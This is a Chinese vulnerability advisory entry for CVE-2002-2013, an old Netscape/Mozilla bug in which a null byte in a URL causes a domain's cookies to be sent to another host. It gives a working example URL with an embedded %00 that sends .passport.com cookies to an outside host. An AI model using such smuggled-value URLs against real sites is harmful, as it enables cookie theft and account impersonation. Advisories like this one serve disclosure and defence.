Netscape/Mozilla 空字符插入URL中窃取Cookies漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1204787 漏洞类型 输入验证
发布时间 2002-01-25 更新时间 2006-08-23
CVE编号 CVE-2002-2013 CNNVD-ID CNNVD-200212-763
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-763
|漏洞详情
Mozilla是种公开发放、免费使用、开放源码的WEB浏览器,可运行于绝大多数Unix/Linux系统上,也可运行在MacOS和微软Windows9x/ME/NT/2000/XP上。Netscape类似Mozilla,也是一种这样的WEB浏览器。Cookies常常被WEB站点用来验证用户身份,如果攻击者可以窃取某用户的cookies,就可以假扮该用户访问相应的WEB站点。Mozilla和Netscape都存在这样的安全漏洞。比如在受影响的浏览器中加载如下URLhttp://alive.znep.com%00www.passport.com/cgi-bin/cookies将导致".passport.com"这个域对应的cookies被发往"alive.znep.com"。注意,这个漏洞只能窃取某个域对应的cookies,无法窃取特定主机对应的cookies。为利用此漏洞不需要活动脚本的支持。
|参考资料

来源:BID
名称:3925
链接:http://www.securityfocus.com/bid/3925
来源:XF
名称:mozilla-netscape-steal-cookies(7973)
链接:http://www.iss.net/security_center/static/7973.php
来源:BUGTRAQ
名称:20020121MozillaCookieExploit
链接:http://archives.neohapsis.com/archives/bugtraq/2002-01/0270.html
来源:alive.znep.com
链接:http://alive.znep.com/~marcs/security/mozillacookie/demo.html
来源:NSFOCUS
名称:2225
链接:http://www.nsfocus.net/vulndb/2225